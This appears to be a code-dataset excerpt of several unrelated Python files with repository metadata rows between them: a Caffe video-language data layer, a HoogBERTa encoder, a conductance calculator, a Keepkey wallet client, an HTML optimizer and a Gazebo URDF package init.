        self.dataset = dataset
        self.iteration = 0
        self.loc = params['loc_feature']
        loss_type = params['loss_type']
        assert loss_type in ['triplet', 'inter', 'intra']
        # 'triplet' enables both negative types; otherwise just one.
        self.inter = False
        self.intra = False
        if loss_type in ['triplet', 'inter']:
            self.inter = True
        if loss_type in ['triplet', 'intra']:
            self.intra = True
        self.batch_size = params['batch_size']
        self.num_glove_centroids = params['num_glove_centroids']
        # Load the whole HDF5 feature store into memory: video -> array.
        features_h5py = h5py.File(params['features'])
        features = {}
        for key in features_h5py.keys():
            features[key] = np.array(features_h5py[key])
        features_h5py.close()
        self.features = features
        assert self.feature_process_algo in feature_process_dict.keys()
        self.feature_process = feature_process_dict[self.feature_process_algo]
        # Probe one video to learn the pooled feature dimensionality.
        self.feature_dim = self.feature_process(0,0,self.features[self.dataset[0]['video']]).shape[-1]
        self.result = result
        self.feature_key_p = params['feature_key_p']
        self.feature_time_stamp_p = params['feature_time_stamp_p']
        self.feature_time_stamp_n = params['feature_time_stamp_n']
        self.top_keys = [self.feature_key_p, self.feature_time_stamp_p, self.feature_time_stamp_n]
        self.top_shapes = [(self.batch_size, self.feature_dim),
                           (self.batch_size, 2),
                           (self.batch_size,2)]
        if self.inter:
            self.feature_key_inter = 'features_inter'
            self.top_keys.append(self.feature_key_inter)
            self.top_shapes.append((self.batch_size, self.feature_dim))
        if self.intra:
            self.feature_key_intra = 'features_intra'
            self.top_keys.append(self.feature_key_intra)
            self.top_shapes.append((self.batch_size, self.feature_dim))
        self.possible_annotations = possible_segments

    def get_data_test(self, d):
        """Return pooled features and normalised (start, end)/6 location
        features for every candidate segment of one video."""
        video_feats = self.features[d['video']]
        features = np.zeros((len(self.possible_annotations), self.feature_dim))
        loc_feats = np.zeros((len(self.possible_annotations), 2))
        for i, p in enumerate(self.possible_annotations):
            features[i,:] = self.feature_process(p[0], p[1], video_feats)
            loc_feats[i,:] = [p[0]/6., p[1]/6.]
        return features, loc_feats

    def get_data(self, next_batch):
        """Fill the shared result dict with this batch's positive features,
        time stamps and sampled negatives."""
        feature_process = self.feature_process
        data = self.dataset
        features_p = np.zeros((self.batch_size, self.feature_dim))
        if self.inter: features_inter = np.zeros((self.batch_size, self.feature_dim))
        if self.intra: features_intra = np.zeros((self.batch_size, self.feature_dim))
        features_time_stamp_p = np.zeros((self.batch_size, 2))
        features_time_stamp_n = np.zeros((self.batch_size, 2))
        for i, nb in enumerate(next_batch):
            # Sample one ground-truth (start, end) annotation for this item.
            rint = random.randint(0,len(data[nb]['times'])-1)
            gt_s = data[nb]['times'][rint][0]
            gt_e = data[nb]['times'][rint][1]
            # Intra-video negative: any other candidate segment.
            possible_n = list(set(self.possible_annotations) - set(((gt_s,gt_e),)))
            random.shuffle(possible_n)
            n = possible_n[0]
            assert n != (gt_s, gt_e)
            video = data[nb]['video']
            feats = self.features[video]
            if self.inter:
                # Inter-video negative: same segment from a different video.
                other_video = data[nb]['video']
                while (other_video == video):
                    other_video_index = int(random.random()*len(data))
                    other_video = data[other_video_index]['video']
                feats_inter = self.features[other_video]
            features_p[i,:] = feature_process(gt_s, gt_e, feats)
            if self.intra:
                features_intra[i,:] = feature_process(n[0], n[1], feats)
            if self.inter:
                try:
                    features_inter[i,:] = feature_process(gt_s, gt_e, feats_inter)
                except:
                    pdb.set_trace()
            if self.loc:
                # Location features normalised by the 6-chunk video length.
                features_time_stamp_p[i,0] = gt_s/6.
                features_time_stamp_p[i,1] = gt_e/6.
                features_time_stamp_n[i,0] = n[0]/6.
                features_time_stamp_n[i,1] = n[1]/6.
            else:
                features_time_stamp_p[i,0] = 0
                features_time_stamp_p[i,1] = 0
                features_time_stamp_n[i,0] = 0
                features_time_stamp_n[i,1] = 0
            assert not math.isnan(np.mean(self.features[data[nb]['video']][n[0]:n[1]+1,:]))
            assert not math.isnan(np.mean(self.features[data[nb]['video']][gt_s:gt_e+1,:]))
        self.result[self.feature_key_p] = features_p
        self.result[self.feature_time_stamp_p] = features_time_stamp_p
        self.result[self.feature_time_stamp_n] = features_time_stamp_n
        if self.inter:
            self.result[self.feature_key_inter] = features_inter
        if self.intra:
            self.result[self.feature_key_intra] = features_intra
class batchAdvancer(object):
    """Callable that advances one batch: asks the first extractor for the
    next identifiers, then has every extractor load data for them."""

    def __init__(self, extractors):
        self.extractors = extractors
        # The first extractor owns the shared iteration state.
        self.increment_extractor = extractors[0]

    def __call__(self):
        batch_ids = self.increment_extractor.increment()
        for extractor in self.extractors:
            extractor.get_data(batch_ids)
class python_data_layer(caffe.Layer):
    """ General class to extract data.

    Caffe python layer that prefetches batches on a background thread:
    setup() wires the extractors and starts the first fetch, forward()
    joins the worker, copies its results into the tops, and kicks off the
    next fetch. Subclasses implement setup_extractors().
    """

    def setup(self, bottom, top):
        random.seed(10)
        # SECURITY NOTE: param_str from the prototxt is eval'd verbatim —
        # only use with trusted model definitions.
        self.params = eval(self.param_str)
        params = self.params
        assert 'top_names' in params.keys()

        # set up prefetching
        self.thread_result = {}
        self.thread = None

        self.setup_extractors()

        self.batch_advancer = batchAdvancer(self.data_extractors)
        shape_dict = {}
        self.top_names = []
        # Map each extractor output to its position in params['top_names'].
        for de in self.data_extractors:
            for top_name, top_shape in zip(de.top_keys, de.top_shapes):
                shape_dict[top_name] = top_shape
                self.top_names.append((params['top_names'].index(top_name), top_name))

        # Start prefetching the first batch.
        self.dispatch_worker()

        self.top_shapes = [shape_dict[tn[1]] for tn in self.top_names]

        print 'Outputs:', self.top_names

        if len(top) != len(self.top_names):
            raise Exception('Incorrect number of outputs (expected %d, got %d)' %
                            (len(self.top_names), len(top)))

        self.join_worker()

        #for top_index, name in enumerate(self.top_names.keys()):
        top_count = 0
        for top_index, name in self.top_names:
            shape = self.top_shapes[top_count]
            print 'Top name %s has shape %s.' %(name, shape)
            top[top_index].reshape(*shape)
            top_count += 1

    def reshape(self, bottom, top):
        # Tops keep the shapes fixed in setup().
        pass

    def forward(self, bottom, top):
        # Wait for the prefetch thread, publish its results, prefetch again.
        if self.thread is not None:
            self.join_worker()

        for top_index, name in self.top_names:
            top[top_index].data[...] = self.thread_result[name]

        self.dispatch_worker()

    def dispatch_worker(self):
        assert self.thread is None
        self.thread = Thread(target=self.batch_advancer)
        self.thread.start()

    def join_worker(self):
        assert self.thread is not None
        self.thread.join()
        self.thread = None

    # Data layer: no gradients to propagate. (Parameter name 'propoagate_down'
    # is a typo kept from the original signature.)
    def backward(self, top, propoagate_down, bottom):
        pass
# Dispatch tables used by the data layers below. NOTE: feature_process_dict
# duplicates the identical declaration earlier in this file.
feature_process_dict = {'feature_process_base': feature_process_base,
                        'feature_process_norm': feature_process_norm,
                        'feature_process_context': feature_process_context,
                       }
# Config string -> language preprocessor class.
language_feature_process_dict = {'zero_language': zero_language_vector,
                                 'recurrent_embedding': recurrent_embedding}
class dataLayer_ExtractPairedLanguageVision(python_data_layer):
    """Caffe data layer emitting paired language/vision training batches
    (query + cont tensors, positive/negative visual features and stamps)."""

    def setup_extractors(self):
        # Required layer parameters.
        assert 'top_names' in self.params.keys()
        assert 'descriptions' in self.params.keys()
        assert 'features' in self.params.keys()
        if 'batch_size' not in self.params.keys(): self.params['batch_size'] = 120
        # Fixed output-key names shared by both extractors.
        self.params['query_key'] = 'query'
        self.params['feature_key_n'] = 'features_n'
        self.params['feature_key_p'] = 'features_p'
        self.params['feature_key_t'] = 'features_t'
        self.params['feature_time_stamp_p'] = 'features_time_stamp_p'
        self.params['feature_time_stamp_n'] = 'features_time_stamp_n'
        self.params['cont_key'] = 'cont'

        language_extractor_fcn = extractLanguageFeatures
        visual_extractor_fcn = extractVisualFeatures
        language_process = recurrent_embedding

        # Load annotations, shuffle, and run the language preprocessor.
        data_orig = read_json(self.params['descriptions'])
        random.shuffle(data_orig)
        language_processor = language_process(data_orig)
        data = language_processor.preprocess(data_orig)
        self.params['vocab_dict'] = language_processor.vocab_dict
        num_glove_centroids = language_processor.get_vector_dim()
        self.params['num_glove_centroids'] = num_glove_centroids

        # Both extractors share the same thread_result dict for prefetching.
        visual_feature_extractor = visual_extractor_fcn(data, self.params, self.thread_result)
        textual_feature_extractor = language_extractor_fcn(data, self.params, self.thread_result)
        self.data_extractors = [visual_feature_extractor, textual_feature_extractor]
| 32.267552 | 114 | 0.673625 | 2,388 | 17,005 | 4.536013 | 0.110134 | 0.045236 | 0.026403 | 0.017264 | 0.39014 | 0.334195 | 0.224612 | 0.181222 | 0.126569 | 0.098781 | 0 | 0.008882 | 0.205528 | 17,005 | 526 | 115 | 32.328897 | 0.792894 | 0.021641 | 0 | 0.238213 | 0 | 0 | 0.069793 | 0.009875 | 0 | 0 | 0 | 0 | 0.034739 | 0 | null | null | 0.007444 | 0.042184 | null | null | 0.014888 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2976116c00e8fbc7eadad3295e61cb99c5280023 | 3,018 | py | Python | hoogberta/encoder.py | KateSatida/HoogBERTa_SuperAI2 | e903054bc752a50c391ab610507fdeccc4f5d482 | [
"MIT"
] | null | null | null | hoogberta/encoder.py | KateSatida/HoogBERTa_SuperAI2 | e903054bc752a50c391ab610507fdeccc4f5d482 | [
"MIT"
] | null | null | null | hoogberta/encoder.py | KateSatida/HoogBERTa_SuperAI2 | e903054bc752a50c391ab610507fdeccc4f5d482 | [
"MIT"
] | null | null | null | from .trainer.models import MultiTaskTagger
from .trainer.utils import load_dictionaries,Config
from .trainer.tasks.multitask_tagging import MultiTaskTaggingModule
from fairseq.data.data_utils import collate_tokens
from attacut import tokenize
class HoogBERTaEncoder(object):
    """Wraps the HoogBERTa multi-task tagger to expose sentence feature
    extraction (last-layer hidden states) for Thai text."""

    def __init__(self,layer=12,cuda=False,base_path="."):
        # NOTE(review): 'layer' is accepted but unused here — confirm intent.
        args = Config(base_path=base_path)
        self.base_path = base_path
        self.pos_dict, self.ne_dict, self.sent_dict = load_dictionaries(self.base_path)
        self.model = MultiTaskTagger(args,[len(self.pos_dict), len(self.ne_dict), len(self.sent_dict)])

        if cuda == True:
            self.model = self.model.cuda()

    def extract_features(self,sentence):
        """Tokenize one space-separated sentence with attacut and return
        (token_ids, last-layer features) for it."""
        all_sent = []
        sentences = sentence.split(" ")
        for sent in sentences:
            # Escape literal underscores: "_" is reused as the space marker.
            all_sent.append(" ".join(tokenize(sent)).replace("_","[!und:]"))

        # Join the original space-separated units with the "_" marker.
        sentence = " _ ".join(all_sent)
        tokens = self.model.bert.encode(sentence).unsqueeze(0)
        all_layers = self.model.bert.extract_features(tokens, return_all_hiddens=True)
        return tokens[0], all_layers[-1][0]

    def extract_features_batch(self,sentenceL):
        """Batch variant of extract_features: tokenizes every sentence,
        pads with pad_idx=1, and returns (token batch, features)."""
        inputList = []
        for sentX in sentenceL:
            sentences = sentX.split(" ")
            all_sent = []
            for sent in sentences:
                all_sent.append(" ".join(tokenize(sent)).replace("_","[!und:]"))

            sentence = " _ ".join(all_sent)
            inputList.append(sentence)

        batch = collate_tokens([self.model.bert.encode(sent) for sent in inputList], pad_idx=1)

        #tokens = self.model.bert.encode(inputList)
        return self.extract_features_from_tensor(batch)

    def extract_features_from_tensor(self,batch):
        """Run the encoder on an already-tokenized batch tensor."""
        all_layers = self.model.bert.extract_features(batch, return_all_hiddens=True)
        return batch, all_layers[-1]

    def extract_features2(self,sentence):
        """Variant of extract_features that skips attacut tokenization and
        encodes the raw string directly."""
        # all_sent = []
        # sentences = sentence.split(" ")
        # for sent in sentences:
        #     all_sent.append(" ".join(tokenize(sent)).replace("_","[!und:]"))

        # sentence = " _ ".join(all_sent)
        tokens = self.model.bert.encode(sentence).unsqueeze(0)
        all_layers = self.model.bert.extract_features(tokens, return_all_hiddens=True)
        return tokens[0], all_layers[-1][0]

    def extract_features_batch2(self,sentenceL):
        """Batch variant of extract_features2 (no attacut tokenization)."""
        # inputList = []
        # for sentX in sentenceL:
        #     sentences = sentX.split(" ")
        #     all_sent = []
        #     for sent in sentences:
        #         all_sent.append(" ".join(tokenize(sent)).replace("_","[!und:]"))

        #     sentence = " _ ".join(all_sent)
        #     inputList.append(sentence)

        batch = collate_tokens([self.model.bert.encode(sent) for sent in sentenceL], pad_idx=1)

        #tokens = self.model.bert.encode(inputList)
        return self.extract_features_from_tensor(batch)
| 38.202532 | 103 | 0.61829 | 348 | 3,018 | 5.146552 | 0.198276 | 0.060302 | 0.065327 | 0.063652 | 0.685092 | 0.648241 | 0.648241 | 0.627582 | 0.627582 | 0.627582 | 0 | 0.006702 | 0.258449 | 3,018 | 78 | 104 | 38.692308 | 0.793566 | 0.169317 | 0 | 0.372093 | 0 | 0 | 0.010835 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.139535 | false | 0 | 0.116279 | 0 | 0.395349 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2979426aee0cb9d3f7a35f048ea9d20f5f7f25ea | 1,806 | py | Python | conductor_calculator.py | aj83854/project-lightning-rod | 77867d6c4ee30650023f3ec2a8318edd92530264 | [
"MIT"
] | null | null | null | conductor_calculator.py | aj83854/project-lightning-rod | 77867d6c4ee30650023f3ec2a8318edd92530264 | [
"MIT"
] | null | null | null | conductor_calculator.py | aj83854/project-lightning-rod | 77867d6c4ee30650023f3ec2a8318edd92530264 | [
"MIT"
] | null | null | null | from pyconductor import load_test_values, calculate_conductance
def conductance_calc():
    """Interactive REPL for testing material conductance.

    Presents a menu: list known materials, add one (in-memory only), quit,
    or type a material name to run a conductance calculation on it.
    """
    preloaded_dict = load_test_values()
    # Loop for as long as the material dictionary is non-empty.
    while preloaded_dict:
        print(
            "[1] - Show currently available materials in Material Dictionary\n"
            "[2] - Add a material (will not be saved upon restart)\n"
            "[3] - Quit\n"
            "To test the conductive properties of a material, simply type in its name.\n"
            "Otherwise, type the corresponding number for an option above.\n"
        )
        main_prompt = input(">>> ").lower()
        if main_prompt == "1":
            print(f"\nCurrently contains the following materials:\n{preloaded_dict.keys()}\n")
        elif main_prompt == "2":
            preloaded_dict.addmat()
        elif main_prompt == "3":
            quit()
        else:
            # Anything else is treated as a material-name lookup.
            try:
                calculate_conductance(preloaded_dict[main_prompt])
                while True:
                    again_prompt = input(
                        "Would you like to try another calculation? [Y]es or [N]o: ").lower()
                    if again_prompt in ("y", "yes"):
                        break
                    elif again_prompt in ("n", "no"):
                        print("\nGoodbye!\n")
                        quit()
            except KeyError:
                if main_prompt == "":
                    print("\nNo material specified.\nPlease enter a valid material name "
                          "listed in option [1], or use option [2] to add your own.\n")
                else:  # TODO: add logic handling whether user wants to add missing material
                    print(f"\n{main_prompt} is not a valid material or command!\n")
    # NOTE(review): trailing while-else (no-op). Original indentation was
    # ambiguous — confirm this was not meant as a try-else.
    else:
        pass
if __name__ == "__main__":
conductance_calc()
| 42 | 94 | 0.530454 | 202 | 1,806 | 4.589109 | 0.49505 | 0.075512 | 0.030205 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00708 | 0.374308 | 1,806 | 42 | 95 | 43 | 0.813274 | 0.037099 | 0 | 0.128205 | 0 | 0 | 0.348877 | 0.021301 | 0 | 0 | 0 | 0.02381 | 0 | 1 | 0.025641 | false | 0.025641 | 0.025641 | 0 | 0.051282 | 0.128205 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2980f0b218fed38559f7aa3fa0718ba902a95fb9 | 7,657 | py | Python | hwilib/devices/keepkey.py | cjackie/HWI | 8c1b50aaaac37714b5d61f720b4b06f8aa24c73a | [
"MIT"
] | 285 | 2019-01-31T03:10:19.000Z | 2022-03-31T10:38:37.000Z | hwilib/devices/keepkey.py | cjackie/HWI | 8c1b50aaaac37714b5d61f720b4b06f8aa24c73a | [
"MIT"
] | 426 | 2019-01-31T10:38:02.000Z | 2022-03-28T15:58:13.000Z | hwilib/devices/keepkey.py | cjackie/HWI | 8c1b50aaaac37714b5d61f720b4b06f8aa24c73a | [
"MIT"
] | 128 | 2019-01-30T22:32:32.000Z | 2022-03-28T19:23:46.000Z | """
Keepkey
*******
"""
from ..errors import (
DEVICE_NOT_INITIALIZED,
DeviceNotReadyError,
common_err_msgs,
handle_errors,
)
from .trezorlib import protobuf as p
from .trezorlib.transport import (
hid,
udp,
webusb,
)
from .trezor import TrezorClient, HID_IDS, WEBUSB_IDS
from .trezorlib.messages import (
DebugLinkState,
Features,
HDNodeType,
ResetDevice,
)
from typing import (
Any,
Dict,
List,
Optional,
)
py_enumerate = enumerate # Need to use the enumerate built-in but there's another function already named that

# Keepkey USB vendor/product IDs: 0x0001 is the HID interface, 0x0002 WebUSB.
KEEPKEY_HID_IDS = {(0x2B24, 0x0001)}
KEEPKEY_WEBUSB_IDS = {(0x2B24, 0x0002)}

# Default host:port of the Keepkey emulator's UDP transport.
KEEPKEY_SIMULATOR_PATH = '127.0.0.1:11044'

# Register the Keepkey IDs with the shared Trezor-family transport tables so
# device enumeration picks up Keepkeys as well.
HID_IDS.update(KEEPKEY_HID_IDS)
WEBUSB_IDS.update(KEEPKEY_WEBUSB_IDS)
class KeepkeyFeatures(Features): # type: ignore
def __init__(
self,
*,
firmware_variant: Optional[str] = None,
firmware_hash: Optional[bytes] = None,
**kwargs: Any,
) -> None:
super().__init__(**kwargs)
self.firmware_variant = firmware_variant
self.firmware_hash = firmware_hash
@classmethod
def get_fields(cls) -> Dict[int, p.FieldInfo]:
return {
1: ('vendor', p.UnicodeType, None),
2: ('major_version', p.UVarintType, None),
3: ('minor_version', p.UVarintType, None),
4: ('patch_version', p.UVarintType, None),
5: ('bootloader_mode', p.BoolType, None),
6: ('device_id', p.UnicodeType, None),
7: ('pin_protection', p.BoolType, None),
8: ('passphrase_protection', p.BoolType, None),
9: ('language', p.UnicodeType, None),
10: ('label', p.UnicodeType, None),
12: ('initialized', p.BoolType, None),
13: ('revision', p.BytesType, None),
14: ('bootloader_hash', p.BytesType, None),
15: ('imported', p.BoolType, None),
16: ('unlocked', p.BoolType, None),
21: ('model', p.UnicodeType, None),
22: ('firmware_variant', p.UnicodeType, None),
23: ('firmware_hash', p.BytesType, None),
24: ('no_backup', p.BoolType, None),
25: ('wipe_code_protection', p.BoolType, None),
}
class KeepkeyResetDevice(ResetDevice): # type: ignore
def __init__(
self,
*,
auto_lock_delay_ms: Optional[int] = None,
**kwargs: Any,
) -> None:
super().__init__(**kwargs)
self.auto_lock_delay_ms = auto_lock_delay_ms
@classmethod
def get_fields(cls) -> Dict[int, p.FieldInfo]:
return {
1: ('display_random', p.BoolType, None),
2: ('strength', p.UVarintType, 256), # default=256
3: ('passphrase_protection', p.BoolType, None),
4: ('pin_protection', p.BoolType, None),
5: ('language', p.UnicodeType, "en-US"), # default=en-US
6: ('label', p.UnicodeType, None),
7: ('no_backup', p.BoolType, None),
8: ('auto_lock_delay_ms', p.UVarintType, None),
9: ('u2f_counter', p.UVarintType, None),
}
class KeepkeyDebugLinkState(DebugLinkState): # type: ignore
def __init__(
self,
*,
recovery_cipher: Optional[str] = None,
recovery_auto_completed_word: Optional[str] = None,
firmware_hash: Optional[bytes] = None,
storage_hash: Optional[bytes] = None,
**kwargs: Any,
) -> None:
super().__init__(**kwargs)
self.recovery_cipher = recovery_cipher
self.recovery_auto_completed_word = recovery_auto_completed_word
self.firmware_hash = firmware_hash
self.storage_hash = storage_hash
@classmethod
def get_fields(cls) -> Dict[int, p.FieldType]:
return {
1: ('layout', p.BytesType, None),
2: ('pin', p.UnicodeType, None),
3: ('matrix', p.UnicodeType, None),
4: ('mnemonic_secret', p.BytesType, None),
5: ('node', HDNodeType, None),
6: ('passphrase_protection', p.BoolType, None),
7: ('reset_word', p.UnicodeType, None),
8: ('reset_entropy', p.BytesType, None),
9: ('recovery_fake_word', p.UnicodeType, None),
10: ('recovery_word_pos', p.UVarintType, None),
11: ('recovery_cipher', p.UnicodeType, None),
12: ('recovery_auto_completed_word', p.UnicodeType, None),
13: ('firmware_hash', p.BytesType, None),
14: ('storage_hash', p.BytesType, None),
}
class KeepkeyClient(TrezorClient):
def __init__(self, path: str, password: str = "", expert: bool = False) -> None:
"""
The `KeepkeyClient` is a `HardwareWalletClient` for interacting with the Keepkey.
As Keepkeys are clones of the Trezor 1, please refer to `TrezorClient` for documentation.
"""
super(KeepkeyClient, self).__init__(path, password, expert, KEEPKEY_HID_IDS, KEEPKEY_WEBUSB_IDS, KEEPKEY_SIMULATOR_PATH)
self.type = 'Keepkey'
self.client.vendors = ("keepkey.com")
self.client.minimum_versions = {"K1-14AM": (0, 0, 0)}
self.client.map_type_to_class_override[KeepkeyFeatures.MESSAGE_WIRE_TYPE] = KeepkeyFeatures
self.client.map_type_to_class_override[KeepkeyResetDevice.MESSAGE_WIRE_TYPE] = KeepkeyResetDevice
if self.simulator:
self.client.debug.map_type_to_class_override[KeepkeyDebugLinkState.MESSAGE_WIRE_TYPE] = KeepkeyDebugLinkState
def enumerate(password: str = "") -> List[Dict[str, Any]]:
results = []
devs = hid.HidTransport.enumerate(usb_ids=KEEPKEY_HID_IDS)
devs.extend(webusb.WebUsbTransport.enumerate(usb_ids=KEEPKEY_WEBUSB_IDS))
devs.extend(udp.UdpTransport.enumerate(KEEPKEY_SIMULATOR_PATH))
for dev in devs:
d_data: Dict[str, Any] = {}
d_data['type'] = 'keepkey'
d_data['model'] = 'keepkey'
d_data['path'] = dev.get_path()
client = None
with handle_errors(common_err_msgs["enumerate"], d_data):
client = KeepkeyClient(d_data['path'], password)
try:
client.client.refresh_features()
except TypeError:
continue
if 'keepkey' not in client.client.features.vendor:
continue
d_data['label'] = client.client.features.label
if d_data['path'].startswith('udp:'):
d_data['model'] += '_simulator'
d_data['needs_pin_sent'] = client.client.features.pin_protection and not client.client.features.unlocked
d_data['needs_passphrase_sent'] = client.client.features.passphrase_protection # always need the passphrase sent for Keepkey if it has passphrase protection enabled
if d_data['needs_pin_sent']:
raise DeviceNotReadyError('Keepkey is locked. Unlock by using \'promptpin\' and then \'sendpin\'.')
if d_data['needs_passphrase_sent'] and not password:
raise DeviceNotReadyError("Passphrase needs to be specified before the fingerprint information can be retrieved")
if client.client.features.initialized:
d_data['fingerprint'] = client.get_master_fingerprint().hex()
d_data['needs_passphrase_sent'] = False # Passphrase is always needed for the above to have worked, so it's already sent
else:
d_data['error'] = 'Not initialized'
d_data['code'] = DEVICE_NOT_INITIALIZED
if client:
client.close()
results.append(d_data)
return results
| 37.534314 | 176 | 0.614601 | 863 | 7,657 | 5.225956 | 0.273465 | 0.019956 | 0.04612 | 0.030599 | 0.206874 | 0.092018 | 0.092018 | 0.077827 | 0.054989 | 0.045676 | 0 | 0.018095 | 0.263811 | 7,657 | 203 | 177 | 37.719212 | 0.781976 | 0.0653 | 0 | 0.189349 | 0 | 0 | 0.126143 | 0.021657 | 0 | 0 | 0.003375 | 0 | 0 | 1 | 0.047337 | false | 0.065089 | 0.04142 | 0.017751 | 0.136095 | 0.011834 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
2986e8913a7519f773b1d594848f51448026d50a | 583 | py | Python | utils/HTMLParser.py | onyb/janitor | a46f3bf23467a27c6f5891b64c797295e5cc47d0 | [
"Apache-2.0"
] | null | null | null | utils/HTMLParser.py | onyb/janitor | a46f3bf23467a27c6f5891b64c797295e5cc47d0 | [
"Apache-2.0"
] | null | null | null | utils/HTMLParser.py | onyb/janitor | a46f3bf23467a27c6f5891b64c797295e5cc47d0 | [
"Apache-2.0"
] | null | null | null | from bs4 import BeautifulSoup
from optimizers.AdvancedJSOptimizer import AdvancedJSOptimizer
from optimizers.CSSOptimizer import CSSOptimizer
class HTMLParser(object):
def __init__(self, html):
self.soup = BeautifulSoup(html, 'lxml')
def js_parser(self):
for script in self.soup.find_all('script'):
opt = AdvancedJSOptimizer()
script.string = opt.process(script.string)
def css_parser(self):
for style in self.soup.find_all('style'):
opt = CSSOptimizer()
style.string = opt.process(style.string) | 32.388889 | 62 | 0.680961 | 66 | 583 | 5.893939 | 0.424242 | 0.061697 | 0.066838 | 0.071979 | 0.087404 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002217 | 0.226415 | 583 | 18 | 63 | 32.388889 | 0.86031 | 0 | 0 | 0 | 0 | 0 | 0.025685 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.214286 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
461ea3bb055956b5f646cce50edcc52ff396af68 | 4,041 | py | Python | pcg_gazebo/parsers/urdf/__init__.py | TForce1/pcg_gazebo | 9ff88016b7b6903236484958ca7c6ed9f8ffb346 | [
"ECL-2.0",
"Apache-2.0"
] | 40 | 2020-02-04T18:16:49.000Z | 2022-02-22T11:36:34.000Z | pcg_gazebo/parsers/urdf/__init__.py | awesomebytes/pcg_gazebo | 4f335dd460ef7c771f1df78b46a92fad4a62cedc | [
"ECL-2.0",
"Apache-2.0"
] | 75 | 2020-01-23T13:40:50.000Z | 2022-02-09T07:26:01.000Z | pcg_gazebo/parsers/urdf/__init__.py | GimpelZhang/gazebo_world_generator | eb7215499d0ddc972d804c988fadab1969579b1b | [
"ECL-2.0",
"Apache-2.0"
] | 18 | 2020-09-10T06:35:41.000Z | 2022-02-20T19:08:17.000Z | # Copyright (c) 2019 - The Procedural Generation for Gazebo authors
# For information on the respective copyright owner see the NOTICE file
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .actuator import Actuator
from .axis import Axis
from .box import Box
from .child import Child
from .collision import Collision
from .color import Color
from .cylinder import Cylinder
from .dynamics import Dynamics
from .gazebo import Gazebo
from .geometry import Geometry
from .hardware_interface import HardwareInterface
from .inertia import Inertia
from .inertial import Inertial
from .joint import Joint
from .limit import Limit
from .link import Link
from .mass import Mass
from .material import Material
from .mechanical_reduction import MechanicalReduction
from .mesh import Mesh
from .mimic import Mimic
from .origin import Origin
from .parent import Parent
from .robot import Robot
from .safety_controller import SafetyController
from .sphere import Sphere
from .texture import Texture
from .transmission import Transmission
from .type import Type
from .visual import Visual
def get_all_urdf_element_classes():
"""Get list of all URDF element classes."""
import sys
import inspect
from ..types import XMLBase
output = list()
current_module = sys.modules[__name__]
for name, obj in inspect.getmembers(current_module):
if inspect.isclass(obj):
if issubclass(obj, XMLBase) and obj._TYPE == 'urdf':
output.append(obj)
return output
def create_urdf_element(tag, *args):
"""URDF element factory.
> *Input arguments*
* `tag` (*type:* `str`): Name of the URDF element.
* `args`: Extra arguments for URDF element constructor.
> *Returns*
URDF element if `tag` refers to a valid URDF element.
`None`, otherwise.
"""
import sys
import inspect
from ..types import XMLBase
current_module = sys.modules[__name__]
for name, obj in inspect.getmembers(current_module):
if inspect.isclass(obj):
if issubclass(obj, XMLBase):
if tag == obj._NAME and obj._TYPE == 'urdf':
return obj(*args)
return None
def create_urdf_type(tag):
"""Return handle of the URDF element type.
> *Input arguments*
* `tag` (*type:* `str`): Name of the URDF element.
> *Returns*
URDF element type if `tag` is valid, `None` otherwise`.
"""
import sys
import inspect
from ..types import XMLBase
current_module = sys.modules[__name__]
for name, obj in inspect.getmembers(current_module):
if inspect.isclass(obj):
if issubclass(obj, XMLBase):
if tag == obj._NAME and obj._TYPE == 'urdf':
return obj
return None
def is_urdf_element(obj):
"""Test if XML element is an URDF element."""
from ..types import XMLBase
return obj.__class__ in XMLBase.__subclasses__() and \
obj._TYPE == 'urdf'
__all__ = [
'get_all_urdf_element_classes',
'create_urdf_element',
'create_urdf_type',
'is_urdf_element',
'Actuator',
'Axis',
'Box',
'Child',
'Collision',
'Color',
'Cylinder',
'Dynamics',
'Gazebo',
'Geometry',
'HardwareInterface',
'Inertia',
'Inertial',
'Joint',
'Limit',
'Link',
'Mass',
'Material',
'MechanicalReduction',
'Mesh',
'Mimic',
'Origin',
'Parent',
'Robot',
'SafetyController',
'Sphere',
'Texture',
'Transmission',
'Type',
'Visual'
]
